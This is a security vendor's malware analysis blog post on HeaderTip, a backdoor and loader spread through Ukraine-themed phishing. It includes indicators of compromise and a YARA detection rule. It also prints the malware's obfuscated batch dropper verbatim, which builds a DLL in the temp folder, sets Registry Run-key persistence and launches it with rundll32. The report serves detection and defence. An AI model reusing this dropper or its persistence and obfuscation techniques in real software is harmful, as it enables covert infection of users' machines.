Blog

eSentire Threat Intelligence Malware Analysis: HeaderTip

BY eSentire Threat Response Unit (TRU)

April 5, 2022 | 9 MINS READ

Attacks/Breaches

Threat Intelligence

Threat Response Unit

Want to learn more on how to achieve Cyber Resilience?

TALK TO AN EXPERT

IN THIS POST

Since humans are still the weakest link in cybersecurity, threat actor(s) continue to prey on fallible human nature to launch cyberattacks. As the Russia-Ukraine conflict continues to impact the global economy and draw worldwide attention, these tensions create opportunities for threat actor(s) to designing campaigns to exploit human vulnerabilities and anxieties stemming from the Russia-Ukraine conflict.

HeaderTip is a malware used by threat actor(s) that are leveraging the current Russia-Ukraine conflict to spread persistent malware. eSentire Threat Intelligence assesses with high confidence that HeaderTip serves as a backdoor and a loader for threat actor(s) to further deploy rootkits, trojans, or other types of malware.

eSentire’s Threat Intelligence team has performed a technical malware analysis on HeaderTip. This technical analysis provides a breakdown of how HeaderTip achieves the persistence on the infected machine and how it obfuscates the code to evade detections.

Key Takeaways

  • eSentire Threat Intelligence assesses with high confidence that the initial access vector for HeaderTip was a phishing attack.
  • The threat actor(s) is using obfuscation techniques in the malware sample to hinder the analysis and avoid detection.
  • The malware achieves the persistence via Registry Run Keys that link to the dropped files in %TEMP% folder.
  • HeaderTip utilizes ChangeIP for Dynamic DNS (DDNS), which allows the attacker(s) to evade detections.
  • eSentire’s Threat Response Unit (TRU) created two new detections to identify the HeaderTip malware.

Case Study

On March 22, 2022, the Computer Emergency Response Team of Ukraine (CERT-UA) detected the RAR-archive translated as, “The preservation of video materials on criminal actions from Russian military” from a Ukrainian organization. The malware campaign is dubbed as HeaderTip and is being tracked as UAC-0026.

CERT-UA reported that they observed similar activity in September 2020. In addition, researchers at SentinelOne have tied the malware campaign to the suspected Chinese group of threat actors known as Scarab. The Scarab malware was first observed in 2012 targeting organizations in Russia, Ukraine, United States, Chile, and Syria.

Technical Analysis on HeaderTip

The RAR archive contains an executable with the same naming convention as the archive. The executable has an embedded PDF file and is not signed. The 32-bit executable is written in C++ programming language with a file size of 653 KB.

An overview of the malicious files, domains and IPs related to HeaderTip (Exhibit 1).

Exhibit 1: Overview of HeaderTip malicious files from VirusTotal graph


The executable file contains the .RCData section with an embedded PDF file which is likely used as a bait. The PDF document contains information from the National Police of Ukraine with instructions on how to retain video evidence on criminal activities conducted by the Russian military in Ukraine so they can be used in investigations by the Criminal Investigative Division of Ukraine (Exhibits 2-3).

The metadata indicates that the PDF document was created on March 16, 2022, which is the exact date when the document was issued and signed. We assess with high confidence that the document was not forged. The document was written by a native Ukrainian speaker, based on grammatical accuracy and vocabulary.

Exhibit 2: The resource containing a PDF header and objects


Exhibit 3: The contents of the decoy PDF document


The second resource contains the dropped .BAT file named “officecleaner.dat” with the following commands:

@echo off
set objfile=%temp%\httpshelper.dll
if not exist %objfile% (
    echo | set /p="M%fgopvhrsdfertj%Z" > %objfile%
    type %temp%\officecleaner.dat >> %objfile%
    del %temp%\officecleaner.dat
    re%ooperoitlksdfgljjdfgijtrjg%g add HK%iwejhjkhkl%CU\Software\Microsoft\Windows\C%ljljlkwjefiofljksdfha%urrentVersion\Run /v "httpshelper" /d "c:\windows\system32\run%jlkjfaewiuoqrjljretfdsg%dll32.exe %objfile%,OAService" /f
    start c:\windows\system32\rundll32.exe %objfile%,OAService
) else (
set bat="bat"
)

The command is responsible for dropping a malicious .DLL (Dynamic Link Library) file (officecleaner.dat) onto the %TEMP% folder, appends the MZ (the executable file format used for .EXE files in DOS header) to it and renames the officecleaner.dat file as httpshelper.dll. Additionally, the batch file sets up a persistence mechanism via Registry Run Keys. The officecleaner.dat file is removed from %TEMP% folder after successfully renaming itself (Exhibit 4).

The de-obfuscated command is used to add the Registry Run Key with the key name “OAService” to run the malicious httpshelper.dll file:

Exhibit 4: The contents of the .BAT file


The third resource contains a .DLL file with a missing executable (MZ) header (Exhibit 5).

Exhibit 5: Resource containing the .DLL file


Upon analyzing the executable file in a disassembler, we found another value being added to the Registry Run Keys (Exhibit 6):

The added httpsrvlog key is responsible for running the officecleaner.bat file under the %TEMP% directory.

Exhibit 6: Registry Run Key added for httpsrvlog value


We have observed the following files being dropped onto the %TEMP% folder after the running the malicious executable:

Analyzing the httpshelper.dll file

The 32-bit .DLL file is written in C++ programming language. The size of the file is relatively small – 9.50 KB. Upon analyzing the file in a disassembler, we have noticed that the malware is hiding the API imports by applying the stackstrings and dynamically resolving APIs at runtime (Exhibit 7).

Exhibit 7: Using stackstrings for obfuscation


The malware hashes the libraries and API functions by applying ROR-13 calculation to evade detections. LoadLibraryA is used to load the Wininet library, which contains the functions that enables the application to interact with HTTP protocol in our malware sample. GetProcAddress API is used to resolve the function’s address. (Exhibit 8-9).

Exhibit 8: Resolved APIs and kernel32 DLL


Exhibit 9: Using GetProcAddress to resolve the functions


The malicious DLL initiates the connection to the C2 domain over port 8080, the function resides in export named OAService (Exhibit 10). The threat actor(s) is utilizing Dynamic DNS (DDNS) from ChangeIP with the hardcoded domain in the DLL sample, which means that the infected machines can connect to C2 servers using a domain name instead of IP address. This gives the threat actor(s) a huge benefit as they can change or not have to rely on IP addresses to avoid detection.

Exhibit 10: C2 connection over port 8080


The main C2 communication function is shown in Exhibit 11. The malware creates a POST request handle, checks if the request is successfully received from the C2 server with HTTP response code 200, and reads 128 bytes of data received from C2 server by calling InternetReadFile API (Exhibit 12). It also uses the User-Agent string, Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko, for C2 communications.

Exhibit 11: Main C2 function


We have also noticed a function containing a “Loader” string. We believe the function is responsible for loading the DLL into the memory by using VirtualAlloc API to allocate new memory regions inside the address space of a process (Exhibit 12). First, it compares if the file contains MZ header, then it loops through the first 4096 bytes of the DLL file (Exhibit 13).

Exhibit 12: Function checks for the MZ header and calls VirtualAlloc


Exhibit 13: The function loops through the first 4096 bytes of the DLL file

What eSentire is doing about it

Our Threat Response Unit (TRU) combines threat intelligence obtained from research, security incidents, and the external threat landscape to produce actionable outcomes for our customers. We are taking a holistic response approach to combat all malware by deploying countermeasures, such as:

Our detection content is supported by investigation runbooks, ensuring our SOC cyber analysts respond rapidly to any intrusion attempts. In addition, our Threat Response Unit closely monitors the threat landscape and addresses capability gaps and performs retroactive threat hunts to assess customer impact.

Recommendations from eSentire’s Threat Response Unit (TRU)

We recommend implementing the following controls to help secure your organization against HeaderTip malware:

While the Tactics, Techniques, and Procedures (TTPs) used by threat actor(s) grow in sophistication, they lead to a limited set of options at which critical business decisions must be made. Intercepting the various attack paths utilized by the modern threat actor requires actively monitoring the threat landscape, developing, and deploying endpoint detection, and the ability to investigate logs & network data during active intrusions.

eSentire’s Threat Response Unit (TRU) is a world-class team of threat researchers who develop new detections enriched by original threat intelligence and leverage new machine learning models that correlate multi-signal data and automate rapid response to advanced threats.

If you are not currently engaged with an MDR provider, eSentire MDR can help you reclaim the advantage and put your business ahead of disruption.

Learn what it means to have an elite team of Threat Hunters and Researchers that works for you. Connect with an eSentire Security Specialist.

Appendix

Sources

Indicators of Compromise

Name Indicators
Про збереження відеоматеріалів з фіксацією злочинних дій армії російської федерації.rar 839e968aa5a6691929b4d65a539c2261f4ecd1c504a8ba52abbfbac0774d6fa3 (SHA-256)
Про збереження відеоматеріалів з фіксацією злочинних дій армії російської федерації.exe 042271aadf2191749876fc99997d0e6bdd3b89159e7ab8cd11a9f13ae65fa6b1 (SHA-256)
#2163_02_33-2022.pdf (decoy PDF) C0962437a293b1e1c2702b98d935e929456ab841193da8b257bd4ab891bf9f69 (SHA-256)
officecleaner.dat a2ffd62a500abbd157e46f4caeb91217738297709362ca2c23b0c2d117c7df38
officecleaner.bat 830c6ead1d972f0f41362f89a50f41d869e8c22ea95804003d2811c3a09c3160
httpshelper.dll 63a218d3fc7c2f7fcadc0f6f907f326cc86eb3f8cf122704597454c34c141cf1
C2 Domain product2020[.]mrbasic[.]com
IP 104.155.198[.]25

Yara Rules

The Yara rule for the malicious DLL and the executable:

import "pe"
import "math"
rule  HeaderTip {
    meta:
        author = "eSentire TI"
        date = "03/27/2022"
        version = "1.0"
    strings:
        $string = "%016I64x%08x" wide fullword nocase 
        $user_agent = "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" wide fullword nocase
        $export = "OAService"  
        $dll_name = "httpshelper.dll" 
        $c2_domain = "product2020.mrbasic.com" wide fullword nocase
    condition:
        for any i in (0..pe.number_of_sections - 1): (
            math.entropy(pe.sections[i].raw_data_offset, pe.sections[i].raw_data_size) >=6 and
            pe.sections[i].name == ".text") and
        all of them and
        (uint16(0) == 0x5A4D or uint32(0) == 0x4464c457f)        
}
eSentire Unit
eSentire Threat Response Unit (TRU)

The eSentire Threat Response Unit (TRU) is an industry-leading threat research team committed to helping your organization become more resilient. TRU is an elite team of threat hunters and researchers that supports our 24/7 Security Operations Centers (SOCs), builds threat detection models across the eSentire XDR Cloud Platform, and works as an extension of your security team to continuously improve our Managed Detection and Response service. By providing complete visibility across your attack surface and performing global threat sweeps and proactive hypothesis-driven threat hunts augmented by original threat research, we are laser-focused on defending your organization against known and unknown threats.

Read the Latest from eSentire